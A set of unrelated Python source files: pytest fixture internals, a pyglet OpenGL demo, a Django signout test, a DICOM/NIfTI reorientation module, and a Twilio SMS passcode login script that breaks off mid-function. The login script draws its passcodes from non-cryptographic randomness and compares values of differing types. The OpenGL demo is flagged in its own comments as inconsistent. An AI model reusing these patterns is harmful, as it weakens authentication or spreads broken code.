        if usefixtures is not None:
            initialnames = usefixtures.args + initialnames
        fm = node.session._fixturemanager
        names_closure, arg2fixturedefs = fm.getfixtureclosure(initialnames,
                                                              node)
        return FuncFixtureInfo(argnames, names_closure, arg2fixturedefs)
    def pytest_plugin_registered(self, plugin):
        nodeid = None
        try:
            p = py.path.local(plugin.__file__)
        except AttributeError:
            pass
        else:
            # construct the base nodeid which is later used to check
            # what fixtures are visible for particular tests (as denoted
            # by their test id)
            if p.basename.startswith("conftest.py"):
                nodeid = p.dirpath().relto(self.config.rootdir)
                if p.sep != "/":
                    nodeid = nodeid.replace(p.sep, "/")
        self.parsefactories(plugin, nodeid)
    def _getautousenames(self, nodeid):
        """ return a tuple of fixture names to be used. """
        autousenames = []
        for baseid, basenames in self._nodeid_and_autousenames:
            if nodeid.startswith(baseid):
                if baseid:
                    # require a real node-path boundary after the base id,
                    # so "tests/foo" does not match "tests/foobar"
                    i = len(baseid)
                    nextchar = nodeid[i:i+1]
                    if nextchar and nextchar not in ":/":
                        continue
                autousenames.extend(basenames)
        # make sure autousenames are sorted by scope, scopenum 0 is session
        autousenames.sort(
            key=lambda x: self._arg2fixturedefs[x][-1].scopenum)
        return autousenames
    def getfixtureclosure(self, fixturenames, parentnode):
        # collect the closure of all fixtures , starting with the given
        # fixturenames as the initial set.  As we have to visit all
        # factory definitions anyway, we also return a arg2fixturedefs
        # mapping so that the caller can reuse it and does not have
        # to re-discover fixturedefs again for each fixturename
        # (discovering matching fixtures for a given name/node is expensive)
        parentid = parentnode.nodeid
        fixturenames_closure = self._getautousenames(parentid)
        def merge(otherlist):
            for arg in otherlist:
                if arg not in fixturenames_closure:
                    fixturenames_closure.append(arg)
        merge(fixturenames)
        arg2fixturedefs = {}
        lastlen = -1
        # iterate to a fixed point: fixtures pulled in by other fixtures
        # may themselves require further fixtures
        while lastlen != len(fixturenames_closure):
            lastlen = len(fixturenames_closure)
            for argname in fixturenames_closure:
                if argname in arg2fixturedefs:
                    continue
                fixturedefs = self.getfixturedefs(argname, parentid)
                if fixturedefs:
                    arg2fixturedefs[argname] = fixturedefs
                    merge(fixturedefs[-1].argnames)
        return fixturenames_closure, arg2fixturedefs
    def pytest_generate_tests(self, metafunc):
        for argname in metafunc.fixturenames:
            faclist = metafunc._arg2fixturedefs.get(argname)
            if faclist:
                fixturedef = faclist[-1]
                if fixturedef.params is not None:
                    func_params = getattr(getattr(metafunc.function, 'parametrize', None), 'args', [[None]])
                    # skip directly parametrized arguments
                    if argname not in func_params:
                        metafunc.parametrize(argname, fixturedef.params,
                                             indirect=True, scope=fixturedef.scope,
                                             ids=fixturedef.ids)
            else:
                continue # will raise FixtureLookupError at setup time
    def pytest_collection_modifyitems(self, items):
        # separate parametrized setups
        items[:] = reorder_items(items)
    def parsefactories(self, node_or_obj, nodeid=NOTSET, unittest=False):
        """Scan *node_or_obj* for fixture definitions and register them
        as FixtureDef objects under their visibility base id."""
        if nodeid is not NOTSET:
            holderobj = node_or_obj
        else:
            holderobj = node_or_obj.obj
            nodeid = node_or_obj.nodeid
        if holderobj in self._holderobjseen:
            return
        self._holderobjseen.add(holderobj)
        autousenames = []
        for name in dir(holderobj):
            obj = getattr(holderobj, name, None)
            if not callable(obj):
                continue
            # fixture functions have a pytest_funcarg__ prefix (pre-2.3 style)
            # or are "@pytest.fixture" marked
            marker = getfixturemarker(obj)
            if marker is None:
                if not name.startswith(self._argprefix):
                    continue
                marker = defaultfuncargprefixmarker
                name = name[len(self._argprefix):]
            elif not isinstance(marker, FixtureFunctionMarker):
                # magic globals  with __getattr__ might have got us a wrong
                # fixture attribute
                continue
            else:
                assert not name.startswith(self._argprefix)
            fixturedef = FixtureDef(self, nodeid, name, obj,
                                    marker.scope, marker.params,
                                    yieldctx=marker.yieldctx,
                                    unittest=unittest, ids=marker.ids)
            faclist = self._arg2fixturedefs.setdefault(name, [])
            if fixturedef.has_location:
                faclist.append(fixturedef)
            else:
                # fixturedefs with no location are at the front
                # so this inserts the current fixturedef after the
                # existing fixturedefs from external plugins but
                # before the fixturedefs provided in conftests.
                i = len([f for f in faclist if not f.has_location])
                faclist.insert(i, fixturedef)
            if marker.autouse:
                autousenames.append(name)
        if autousenames:
            self._nodeid_and_autousenames.append((nodeid or '', autousenames))
    def getfixturedefs(self, argname, nodeid):
        """Return the tuple of FixtureDefs for *argname* visible from
        *nodeid*, or None if the name is unknown."""
        try:
            fixturedefs = self._arg2fixturedefs[argname]
        except KeyError:
            return None
        else:
            return tuple(self._matchfactories(fixturedefs, nodeid))
    def _matchfactories(self, fixturedefs, nodeid):
        # yield only the definitions whose base id is a prefix of the
        # requesting node id (i.e. visible from that location)
        for fixturedef in fixturedefs:
            if nodeid.startswith(fixturedef.baseid):
                yield fixturedef
def fail_fixturefunc(fixturefunc, msg):
    """Fail the current test with *msg*, appending the indented source
    and location of the offending fixture function (no python traceback)."""
    fs, lineno = getfslineno(fixturefunc)
    location = "%s:%s" % (fs, lineno+1)
    source = py.code.Source(fixturefunc)
    pytest.fail(msg + ":\n\n" + str(source.indent()) + "\n" + location,
                pytrace=False)
def call_fixture_func(fixturefunc, request, kwargs, yieldctx):
    """Invoke a fixture function and return its value.

    For ``yield_fixture`` functions (*yieldctx* true) the generator is
    advanced once to obtain the value and a teardown finalizer is
    registered that resumes it exactly once more; a plain ``@fixture``
    function must not be a generator.
    """
    if yieldctx:
        if not is_generator(fixturefunc):
            fail_fixturefunc(fixturefunc,
                msg="yield_fixture requires yield statement in function")
        # note: "iter" and "next" deliberately shadow the builtins here;
        # getattr handles both py2 ("next") and py3 ("__next__") protocols
        iter = fixturefunc(**kwargs)
        next = getattr(iter, "__next__", None)
        if next is None:
            next = getattr(iter, "next")
        res = next()
        def teardown():
            try:
                next()
            except StopIteration:
                pass
            else:
                # generator yielded again instead of finishing
                fail_fixturefunc(fixturefunc,
                    "yield_fixture function has more than one 'yield'")
        request.addfinalizer(teardown)
    else:
        if is_generator(fixturefunc):
            fail_fixturefunc(fixturefunc,
                msg="pytest.fixture functions cannot use ``yield``. "
                    "Instead write and return an inner function/generator "
                    "and let the consumer call and iterate over it.")
        res = fixturefunc(**kwargs)
    return res
class FixtureDef:
    """ A container for a factory definition. """
    def __init__(self, fixturemanager, baseid, argname, func, scope, params,
                 yieldctx, unittest=False, ids=None):
        self._fixturemanager = fixturemanager
        # nodeid prefix from which this fixture is visible ('' = everywhere)
        self.baseid = baseid or ''
        self.has_location = baseid is not None
        self.func = func
        self.argname = argname
        self.scope = scope
        self.scopenum = scopes.index(scope or "function")
        self.params = params
        # unittest-style fixtures skip the implicit "self" argument
        startindex = unittest and 1 or None
        self.argnames = getfuncargnames(func, startindex=startindex)
        self.yieldctx = yieldctx
        self.unittest = unittest
        self.ids = ids
        # finalizers to run (LIFO) when this fixture is torn down
        self._finalizer = []
    def addfinalizer(self, finalizer):
        self._finalizer.append(finalizer)
    def finish(self):
        """Run all registered finalizers (last-in first-out) and drop
        the cached fixture value."""
        try:
            while self._finalizer:
                func = self._finalizer.pop()
                func()
        finally:
            # even if finalization fails, we invalidate
            # the cached fixture value
            if hasattr(self, "cached_result"):
                del self.cached_result
    def execute(self, request):
        """Return the fixture value for *request*, computing it (and
        caching per parametrization index) on first use."""
        # get required arguments and register our own finish()
        # with their finalization
        kwargs = {}
        for argname in self.argnames:
            fixturedef = request._get_active_fixturedef(argname)
            result, arg_cache_key, exc = fixturedef.cached_result
            request._check_scope(argname, request.scope, fixturedef.scope)
            kwargs[argname] = result
            if argname != "request":
                # tear us down whenever a dependency is torn down
                fixturedef.addfinalizer(self.finish)
        my_cache_key = request.param_index
        cached_result = getattr(self, "cached_result", None)
        if cached_result is not None:
            result, cache_key, err = cached_result
            if my_cache_key == cache_key:
                # cached errors are re-raised so every consumer sees them
                if err is not None:
                    py.builtin._reraise(*err)
                else:
                    return result
            # we have a previous but differently parametrized fixture instance
            # so we need to tear it down before creating a new
            # one
            self.finish()
            assert not hasattr(self, "cached_result")
        fixturefunc = self.func
        if self.unittest:
            if request.instance is not None:
                # bind the unbound method to the TestCase instance
                fixturefunc = self.func.__get__(request.instance)
        else:
            # the fixture function needs to be bound to the actual
            # request.instance so that code working with "self" behaves
            # as expected.
            if request.instance is not None:
                fixturefunc = getimfunc(self.func)
                if fixturefunc != self.func:
                    fixturefunc = fixturefunc.__get__(request.instance)
        try:
            result = call_fixture_func(fixturefunc, request, kwargs,
                                       self.yieldctx)
        except Exception:
            # cache the failure so dependent fixtures fail the same way
            self.cached_result = (None, my_cache_key, sys.exc_info())
            raise
        self.cached_result = (result, my_cache_key, None)
        return result
    def __repr__(self):
        return ("<FixtureDef name=%r scope=%r baseid=%r >" %
                (self.argname, self.scope, self.baseid))
def num_mock_patch_args(function):
    """ return number of arguments used up by mock arguments (if any) """
    patchings = getattr(function, "patchings", None)
    if not patchings:
        return 0
    mock_module = sys.modules.get("mock", sys.modules.get("unittest.mock", None))
    if mock_module is None:
        # mock is not importable: assume every patching injects an argument
        return len(patchings)
    # only positional patchings that inject a fresh mock consume an argument
    count = 0
    for p in patchings:
        if not p.attribute_name and p.new is mock_module.DEFAULT:
            count += 1
    return count
def getfuncargnames(function, startindex=None):
    """Return the tuple of argument names of *function* that should be
    filled by fixtures: positional parameters minus the implicit ``self``
    (for methods), minus mock-injected arguments on wrapped functions,
    and minus parameters that have default values.
    """
    # XXX merge with main.py's varnames
    #assert not inspect.isclass(function)
    realfunction = function
    # unwrap decorators that set __wrapped__ (e.g. functools.wraps chains)
    while hasattr(realfunction, "__wrapped__"):
        realfunction = realfunction.__wrapped__
    if startindex is None:
        startindex = inspect.ismethod(function) and 1 or 0
    if realfunction != function:
        # mock patchings on the wrapper consume leading arguments
        startindex += num_mock_patch_args(function)
        function = realfunction
    if isinstance(function, functools.partial):
        argnames = inspect.getargs(py.code.getrawcode(function.func))[0]
        partial = function
        # drop arguments already bound positionally or by keyword
        argnames = argnames[len(partial.args):]
        if partial.keywords:
            for kw in partial.keywords:
                argnames.remove(kw)
    else:
        argnames = inspect.getargs(py.code.getrawcode(function))[0]
    defaults = getattr(function, 'func_defaults',
                       getattr(function, '__defaults__', None)) or ()
    numdefaults = len(defaults)
    if numdefaults:
        # parameters with defaults are not fixture arguments
        return tuple(argnames[startindex:-numdefaults])
    return tuple(argnames[startindex:])
def reorder_items(items):
    """Reorder test *items* so that items sharing parametrized fixture
    instances of wider-than-function scope run adjacently, minimizing
    setup/teardown churn."""
    argkeys_cache = {}
    for scopenum in range(scopenum_function):
        keymap = {}
        for item in items:
            argkeys = set(get_parametrized_fixture_keys(item, scopenum))
            if argkeys:
                keymap[item] = argkeys
        argkeys_cache[scopenum] = keymap
    return reorder_items_atscope(items, set(), argkeys_cache, 0)
def reorder_items_atscope(items, ignore, argkeys_cache, scopenum):
    """Recursively group *items* by shared parametrized fixture keys at
    *scopenum*, then by narrower scopes, returning the reordered list."""
    # nothing to gain for function scope or lists too small to regroup
    if scopenum >= scopenum_function or len(items) < 3:
        return items
    items_done = []
    while 1:
        items_before, items_same, items_other, newignore = \
                slice_items(items, ignore, argkeys_cache[scopenum])
        # recurse into the prefix with the next narrower scope
        items_before = reorder_items_atscope(
                            items_before, ignore, argkeys_cache,scopenum+1)
        if items_same is None:
            # nothing to reorder in this scope
            assert items_other is None
            return items_done + items_before
        items_done.extend(items_before)
        # regroup the remainder around the next slicing key
        items = items_same + items_other
        ignore = newignore
def slice_items(items, ignore, scoped_argkeys_cache):
    # we pick the first item which uses a fixture instance in the
    # requested scope and which we haven't seen yet.  We slice the input
    # items list into a list of items_nomatch, items_same and
    # items_other
    if scoped_argkeys_cache:  # do we need to do work at all?
        it = iter(items)
        # first find a slicing key
        for i, item in enumerate(it):
            argkeys = scoped_argkeys_cache.get(item)
            if argkeys is not None:
                argkeys = argkeys.difference(ignore)
                if argkeys:  # found a slicing key
                    slicing_argkey = argkeys.pop()
                    items_before = items[:i]
                    items_same = [item]
                    items_other = []
                    # now slice the remainder of the list
                    # (items sharing the key group with items_same)
                    for item in it:
                        argkeys = scoped_argkeys_cache.get(item)
                        if argkeys and slicing_argkey in argkeys and \
                            slicing_argkey not in ignore:
                            items_same.append(item)
                        else:
                            items_other.append(item)
                    newignore = ignore.copy()
                    newignore.add(slicing_argkey)
                    return (items_before, items_same, items_other, newignore)
    # no (further) slicing key found: signal "nothing to reorder"
    return items, None, None, None
def get_parametrized_fixture_keys(item, scopenum):
    """ return list of keys for all parametrized arguments which match
    the specified scope. """
    assert scopenum < scopenum_function  # function
    try:
        cs = item.callspec
    except AttributeError:
        # item is not parametrized at all
        pass
    else:
        # cs.indices.items() is random order of argnames but
        # then again different functions (items) can change order of
        # arguments so it doesn't matter much probably
        for argname, param_index in cs.indices.items():
            if cs._arg2scopenum[argname] != scopenum:
                continue
            # widen the key with enough context to keep instances of
            # the same parametrized fixture distinct across scopes
            if scopenum == 0:    # session
                key = (argname, param_index)
            elif scopenum == 1:  # module
                key = (argname, param_index, item.fspath)
            elif scopenum == 2:  # class
                key = (argname, param_index, item.fspath, item.cls)
            yield key
def xunitsetup(obj, name):
    """Return the xunit-style setup/teardown method *name* from *obj*,
    or None when it is absent or is actually a fixture-marked function."""
    meth = getattr(obj, name, None)
    if getfixturemarker(meth) is not None:
        # a @pytest.fixture with the same name is not an xunit hook
        return None
    return meth
def getfixturemarker(obj):
    """ return fixturemarker or None if it doesn't exist or raised
    exceptions."""
    try:
        marker = getattr(obj, "_pytestfixturefunction", None)
    except KeyboardInterrupt:
        raise
    except Exception:
        # some objects raise errors like request (from flask import request)
        # we don't expect them to be fixture functions
        marker = None
    return marker
# Maps scope names to the collection node class owning that scope;
# "session" is handled specially in get_scope_node.
scopename2class = {
    'class': Class,
    'module': Module,
    'function': pytest.Item,
}
def get_scope_node(node, scope):
    """Return the ancestor collection node of *node* that owns *scope*
    (or the session object for session scope); raise ValueError for an
    unknown scope name."""
    node_class = scopename2class.get(scope)
    if node_class is not None:
        return node.getparent(node_class)
    if scope == "session":
        return node.session
    raise ValueError("unknown scope")
|
"""
This example uses OpenGL via Pyglet and draws
a bunch of rectangles on the screen.
"""
import random
import time
import pyglet.gl as GL
import pyglet
import ctypes
# Window dimensions in pixels.
SCREEN_WIDTH = 700
SCREEN_HEIGHT = 500
# Default rectangle size (not referenced by the visible code).
RECT_WIDTH = 50
RECT_HEIGHT = 50
class Shape():
    """Holds the on-screen position of one drawable rectangle."""
    def __init__(self):
        # Position defaults to the origin; callers assign real
        # coordinates after construction.
        self.x = 0
        self.y = 0
class VertexBuffer():
    """Record describing an uploaded OpenGL vertex buffer object."""
    def __init__(self, vbo_id, size):
        # OpenGL buffer handle (as returned by glGenBuffers).
        self.vbo_id = vbo_id
        # Number of 2-D vertices stored in the buffer.
        self.size = size
def add_rect(rect_list, x, y, width, height, color):
    """ Create a vertex buffer for a rectangle. """
    # Appends the four corners of an origin-centered rectangle in
    # counter-clockwise order (bottom-left, bottom-right, top-right,
    # top-left).  NOTE(review): x, y and color are currently ignored;
    # positioning is applied later via glTranslatef.
    half_w = width / 2
    half_h = height / 2
    rect_list.extend([-half_w, -half_h,
                      half_w, -half_h,
                      half_w, half_h,
                      -half_w, half_h])
def create_vbo_for_rects(v2f):
    """Upload the flat list of 2-D vertex coordinates *v2f* into a new
    OpenGL vertex buffer object and return a VertexBuffer describing it."""
    vbo_id = GL.GLuint()
    GL.glGenBuffers(1, ctypes.pointer(vbo_id))
    # convert the Python list into a contiguous C array of GLfloat
    data2 = (GL.GLfloat*len(v2f))(*v2f)
    GL.glBindBuffer(GL.GL_ARRAY_BUFFER, vbo_id)
    GL.glBufferData(GL.GL_ARRAY_BUFFER, ctypes.sizeof(data2), data2,
                    GL.GL_STATIC_DRAW)
    # size is the vertex count: two floats per vertex
    shape = VertexBuffer(vbo_id, len(v2f)//2)
    return shape
def render_rect_filled(shape, x, y):
    """ Render the shape at the right spot. """
    # Set color
    GL.glDisable(GL.GL_BLEND)
    # NOTE(review): reads shape.color, shape.width and shape.height, which
    # neither Shape nor VertexBuffer in this file ever set -- confirm the
    # intended shape type before calling.
    GL.glColor4ub(shape.color[0], shape.color[1], shape.color[2], 255)
    GL.glBindBuffer(GL.GL_ARRAY_BUFFER, shape.vbo_id)
    GL.glVertexPointer(2, GL.GL_FLOAT, 0, 0)
    GL.glLoadIdentity()
    # vertices are centered on the origin, so translate to the target spot
    GL.glTranslatef(x + shape.width / 2, y + shape.height / 2, 0)
    GL.glDrawArrays(GL.GL_QUADS, 0, shape.size)
class MyApplication():
    """ Main application class. """
    def setup(self):
        """ Set up the game and initialize the variables. """
        # Set background to white
        GL.glClearColor(1, 1, 1, 1)
        self.rect_list = []
        self.shape_list = []
        for i in range(2000):
            # random position, size, velocity and color for each rectangle
            x = random.randrange(0, SCREEN_WIDTH)
            y = random.randrange(0, SCREEN_HEIGHT)
            width = random.randrange(20, 71)
            height = random.randrange(20, 71)
            d_x = random.randrange(-3, 4)
            d_y = random.randrange(-3, 4)
            red = random.randrange(256)
            blue = random.randrange(256)
            green = random.randrange(256)
            alpha = random.randrange(256)
            color = (red, blue, green, alpha)
            shape = Shape()
            shape.x = x
            shape.y = y
            # NOTE(review): width/height/d_x/d_y/color are generated but
            # never stored on the Shape, so animate() and per-shape color
            # cannot use them -- confirm whether they should be kept.
            self.shape_list.append(shape)
            add_rect(self.rect_list, 0, 0, width, height, color)
        print("Creating vbo for {} vertices.".format(len(self.rect_list) // 2))
        self.rect_vbo = create_vbo_for_rects(self.rect_list)
        print("VBO {}".format(self.rect_vbo.vbo_id))
    def animate(self, dt):
        """ Move everything """
        # intentionally a no-op: shapes currently do not store velocities
        pass
    def on_draw(self):
        """
        Render the screen.
        """
        # time one frame to report render cost
        start = time.time()
        float_size = ctypes.sizeof(ctypes.c_float)
        # NOTE(review): a 10-float stride is used below, but add_rect packs
        # vertices contiguously (2 floats each) -- verify the intended
        # vertex layout; likewise glDrawArrays offsets are in vertices,
        # not floats.
        record_len = 10 * float_size
        GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
        GL.glMatrixMode(GL.GL_MODELVIEW)
        GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
        GL.glColor4ub(255, 0, 0, 255)
        GL.glBindBuffer(GL.GL_ARRAY_BUFFER, self.rect_vbo.vbo_id)
        GL.glVertexPointer(2, GL.GL_FLOAT, record_len, 0)
        for i in range(len(self.shape_list)):
            shape = self.shape_list[i]
            GL.glLoadIdentity()
            GL.glTranslatef(shape.x, shape.y, 0)
            GL.glDrawArrays(GL.GL_QUADS, i * 8, 8)
        # GL.glDrawArrays(GL.GL_QUADS,
        #                 0,
        #                 self.rect_vbo.size)
        elapsed = time.time() - start
        print(elapsed)
def main():
    """ Create the window, set up the application, and start the event loop. """
    window = pyglet.window.Window(SCREEN_WIDTH, SCREEN_HEIGHT)
    app = MyApplication()
    app.setup()
    # Drive animation at roughly 60 FPS.
    pyglet.clock.schedule_interval(app.animate, 1/60)
    @window.event
    def on_draw():
        window.clear()
        app.on_draw()
    pyglet.app.run()
main()
|
import mock
from django.test import TestCase
from mediaviewer.views.signout import signout
class TestSignout(TestCase):
    """Unit tests for the signout view with its collaborators patched out."""

    def setUp(self):
        # Patch each collaborator of the view; every patch is undone via
        # addCleanup so failures cannot leak mocks between tests.
        self.logout_patcher = mock.patch('mediaviewer.views.signout.logout')
        self.mock_logout = self.logout_patcher.start()
        self.addCleanup(self.logout_patcher.stop)
        self.setSiteWideContext_patcher = mock.patch(
            'mediaviewer.views.signout.setSiteWideContext')
        self.mock_setSiteWideContext = self.setSiteWideContext_patcher.start()
        self.addCleanup(self.setSiteWideContext_patcher.stop)
        self.render_patcher = mock.patch('mediaviewer.views.signout.render')
        self.mock_render = self.render_patcher.start()
        self.addCleanup(self.render_patcher.stop)
        self.request = mock.MagicMock()

    def test_signout(self):
        expected_context = {
            'active_page': 'logout',
            'loggedin': False,
            'title': 'Signed out',
        }

        result = signout(self.request)

        # The view returns whatever render() produced.
        self.assertEqual(self.mock_render.return_value, result)
        self.mock_logout.assert_called_once_with(self.request)
        self.mock_setSiteWideContext.assert_called_once_with(
            expected_context, self.request)
        self.mock_render.assert_called_once_with(
            self.request,
            'mediaviewer/logout.html',
            expected_context)
|
"""
Created on Thu Aug 1 16:10:56 2013
@author: vterzopoulos, abrys
"""
import nibabel
import numpy
from dicom2nifti.image_volume import load, SliceType, ImageVolume
def reorient_image(input_image, output_image):
    """
    Change the orientation of the Image data in order to be in LAS space
    x will represent the coronal plane, y the sagittal and z the axial plane.
    x increases from Right (R) to Left (L), y from Posterior (P) to Anterior (A) and z from Inferior (I) to Superior (S)

    :returns: The output image in nibabel form
    :param output_image: filepath where the reoriented nifti is written
    :param input_image: filepath to a nifti image, or a nibabel.Nifti1Image instance
    """
    # Use the imageVolume module to find which coordinate corresponds to each plane
    # and get the image data in RAS orientation
    if isinstance(input_image, nibabel.Nifti1Image):
        image = ImageVolume(input_image)
    else:
        image = load(input_image)
    # 4d have a different conversion to 3d
    if image.nifti_data.squeeze().ndim == 4:
        new_image = _reorient_4d(image)
    elif image.nifti_data.squeeze().ndim == 3 or image.nifti_data.ndim == 3 or image.nifti_data.squeeze().ndim == 2:
        new_image = _reorient_3d(image)
    else:
        raise Exception('Only 3d and 4d images are supported')
    affine = image.nifti.affine
    # Based on VolumeImage.py where slice orientation 1 represents the axial plane
    # Flipping on the data may be needed based on x_inverted, y_inverted, ZInverted
    # Create new affine header by changing the order of the columns of the input image header
    # the last column with the origin depends on the origin of the original image, the size and the direction of x,y,z
    new_affine = numpy.eye(4)
    new_affine[:, 0] = affine[:, image.sagittal_orientation.normal_component]
    new_affine[:, 1] = affine[:, image.coronal_orientation.normal_component]
    new_affine[:, 2] = affine[:, image.axial_orientation.normal_component]
    point = [0, 0, 0, 1]
    # If the orientation of coordinates is inverted, then the origin of the "new" image
    # would correspond to the last voxel of the original image
    # First we need to find which point is the origin point in image coordinates
    # and then transform it in world coordinates
    # NOTE(review): the first branch negates when x_inverted is FALSE while the
    # next two negate when y_inverted is TRUE -- asymmetric; confirm against the
    # orientation conventions in image_volume before changing.
    if not image.axial_orientation.x_inverted:
        new_affine[:, 0] = - new_affine[:, 0]
        point[image.sagittal_orientation.normal_component] = image.dimensions[
            image.sagittal_orientation.normal_component] - 1
    if image.axial_orientation.y_inverted:
        new_affine[:, 1] = - new_affine[:, 1]
        point[image.coronal_orientation.normal_component] = image.dimensions[
            image.coronal_orientation.normal_component] - 1
    if image.coronal_orientation.y_inverted:
        new_affine[:, 2] = - new_affine[:, 2]
        point[image.axial_orientation.normal_component] = image.dimensions[image.axial_orientation.normal_component] - 1
    # The new origin is the chosen corner voxel mapped to world coordinates.
    new_affine[:, 3] = numpy.dot(affine, point)
    # DONE: Needs to update new_affine, so that there is no translation difference between the original
    # and created image (now there is 1-2 voxels translation)
    if new_image.ndim > 3:  # do not squeeze single slice data
        new_image = new_image.squeeze()
    output = nibabel.nifti1.Nifti1Image(new_image, new_affine)
    output.header.set_slope_inter(1, 0)
    output.header.set_xyzt_units(2)  # set units for xyz (leave t as unknown)
    output.to_filename(output_image)
    return output
def _reorient_4d(image):
    """
    Reorganize the data for a 4d nifti.

    Returns a numpy array whose x, y, z axes follow the sagittal, coronal
    and axial directions of the input, with the 4th (time) axis preserved.
    """
    # Create empty array where x,y,z correspond to LR (sagittal), PA (coronal), IS (axial) directions and the size
    # of the array in each direction is the same with the corresponding direction of the input image.
    new_image = numpy.zeros([image.dimensions[image.sagittal_orientation.normal_component],
                             image.dimensions[image.coronal_orientation.normal_component],
                             image.dimensions[image.axial_orientation.normal_component],
                             image.dimensions[3]],
                            dtype=image.nifti_data.dtype)
    # loop over all timepoints
    for timepoint in range(0, image.dimensions[3]):
        # Fill the new image with the values of the input image but with matching the orientation with x,y,z
        if image.coronal_orientation.y_inverted:
            # Axial slices are read back-to-front when the coronal y axis is inverted.
            for i in range(new_image.shape[2]):
                new_image[:, :, i, timepoint] = numpy.fliplr(numpy.squeeze(image.get_slice(SliceType.AXIAL,
                                                                                           new_image.shape[2] - 1 - i,
                                                                                           timepoint).original_data))
        else:
            for i in range(new_image.shape[2]):
                new_image[:, :, i, timepoint] = numpy.fliplr(numpy.squeeze(image.get_slice(SliceType.AXIAL,
                                                                                           i, timepoint).original_data))
    return new_image
def _reorient_3d(image):
    """
    Reorganize the data for a 3d nifti.

    Returns a numpy array whose x, y, z axes follow the sagittal, coronal
    and axial directions of the input image.
    """
    # Allocate the target volume: one axis per anatomical direction, sized
    # from the corresponding direction of the input image.
    dims = image.dimensions
    new_image = numpy.zeros([dims[image.sagittal_orientation.normal_component],
                             dims[image.coronal_orientation.normal_component],
                             dims[image.axial_orientation.normal_component]],
                            dtype=image.nifti_data.dtype)
    depth = new_image.shape[2]
    reverse_slices = image.coronal_orientation.y_inverted
    # Copy axial slices one by one, flipping each left/right; when the
    # coronal y axis is inverted the source slices are read back-to-front.
    for target_index in range(depth):
        source_index = depth - 1 - target_index if reverse_slices else target_index
        slice_data = image.get_slice(SliceType.AXIAL, source_index).original_data
        new_image[:, :, target_index] = numpy.fliplr(slice_data)
    return new_image
|
from java.util import Arrays
from javax.faces.application import FacesMessage
from org.gluu.jsf2.message import FacesMessages
from org.gluu.oxauth.security import Identity
from org.gluu.oxauth.service import UserService, AuthenticationService
from org.gluu.oxauth.util import ServerUtil
from org.gluu.model.custom.script.type.auth import PersonAuthenticationType
from org.gluu.service.cdi.util import CdiUtil
from org.gluu.util import StringHelper, ArrayHelper
from com.google.common.base import Joiner
from com.twilio import Twilio
import com.twilio.rest.api.v2010.account.Message as TwMessage
from com.twilio.type import PhoneNumber
import random
import sys
class PersonAuthentication(PersonAuthenticationType):
    """Jython person-authentication script: one-time passcodes via Twilio SMS.

    Step 1 checks username/password and either sends the code (single mobile
    number on file) or records the candidate numbers for a selection page;
    the final step verifies the 6-digit code entered by the user.
    """
    def __init__(self, currentTimeMillis):
        self.currentTimeMillis = currentTimeMillis
    def init(self, customScript, configurationAttributes):
        print "Twilio SMS. Initialized"
        return True
    def destroy(self, configurationAttributes):
        print "Twilio SMS. Destroyed successfully"
        return True
    def getApiVersion(self):
        # oxAuth custom-script API version implemented by this script.
        return 11
    def getAuthenticationMethodClaims(self, configurationAttributes):
        return None
    def isValidAuthenticationMethod(self, usageType, configurationAttributes):
        return True
    def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
        return None
    def authenticate(self, configurationAttributes, requestParameters, step):
        print "TwilioSMS. Authenticate for Step %s" % str(step)
        identity = CdiUtil.bean(Identity)
        authenticationService = CdiUtil.bean(AuthenticationService)
        user = authenticationService.getAuthenticatedUser()
        if step == 1:
            # Primary credentials: authenticate username/password if no user yet.
            if user == None:
                credentials = identity.getCredentials()
                user_name = credentials.getUsername()
                user_password = credentials.getPassword()
                if StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password):
                    authenticationService.authenticate(user_name, user_password)
                    user = authenticationService.getAuthenticatedUser()
            if user == None:
                return False
            #Attempt to send message now if user has only one mobile number
            mobiles = user.getAttributeValues("mobile")
            if mobiles == None:
                return False
            else:
                # Random 6-digit one-time code, kept in the working state for
                # later verification.
                code = random.randint(100000, 999999)
                identity.setWorkingParameter("randCode", code)
                sid = configurationAttributes.get("twilio_sid").getValue2()
                token = configurationAttributes.get("twilio_token").getValue2()
                self.from_no = configurationAttributes.get("from_number").getValue2()
                Twilio.init(sid, token)
                if mobiles.size() == 1:
                    self.sendMessage(code, mobiles.get(0))
                else:
                    # Several numbers on file: expose only the last 4 digits of
                    # each so the user can pick one on the selection page.
                    chopped = ""
                    for numb in mobiles:
                        l = len(numb)
                        chopped += "," + numb[max(0, l-4) : l]
                    #converting to comma-separated list (identity does not remember lists in 3.1.3)
                    identity.setWorkingParameter("numbers", Joiner.on(",").join(mobiles.toArray()))
                    identity.setWorkingParameter("choppedNos", chopped[1:])
            return True
        else:
            if user == None:
                return False
            session_attributes = identity.getSessionId().getSessionAttributes()
            code = session_attributes.get("randCode")
            numbers = session_attributes.get("numbers")
            if step == 2 and numbers != None:
                #Means the selection number page was used
                idx = ServerUtil.getFirstValue(requestParameters, "OtpSmsloginForm:indexOfNumber")
                if idx != None and code != None:
                    sendToNumber = numbers.split(",")[int(idx)]
                    self.sendMessage(code, sendToNumber)
                    return True
                else:
                    return False
            success = False
            form_passcode = ServerUtil.getFirstValue(requestParameters, "OtpSmsloginForm:passcode")
            # NOTE(review): both values come from session/request attributes;
            # presumably both are strings at this point -- confirm before changing.
            if form_passcode != None and code == form_passcode:
                print "TwilioSMS. authenticate. 6-digit code matches with code sent via SMS"
                success = True
            else:
                facesMessages = CdiUtil.bean(FacesMessages)
                facesMessages.setKeepMessages()
                facesMessages.clear()
                facesMessages.add(FacesMessage.SEVERITY_ERROR, "Wrong code entered")
            return success
    def prepareForStep(self, configurationAttributes, requestParameters, step):
        print "TwilioSMS. Prepare for Step %s" % str(step)
        return True
    def getExtraParametersForStep(self, configurationAttributes, step):
        # Working parameters preserved in the session between steps.
        if step > 1:
            return Arrays.asList("randCode", "numbers", "choppedNos")
        return None
    def getCountAuthenticationSteps(self, configurationAttributes):
        print "TwilioSMS. getCountAuthenticationSteps called"
        # An extra step is needed when the user must choose between numbers.
        if CdiUtil.bean(Identity).getWorkingParameter("numbers") == None:
            return 2
        else:
            return 3
    def getPageForStep(self, configurationAttributes, step):
        print "TwilioSMS. getPageForStep called %s" % step
        print "numbers are %s" % CdiUtil.bean(Identity).getWorkingParameter("numbers")
        defPage = "/casa/otp_sms.xhtml"
        if step == 2:
            if CdiUtil.bean(Identity).getWorkingParameter("numbers") == None:
                return defPage
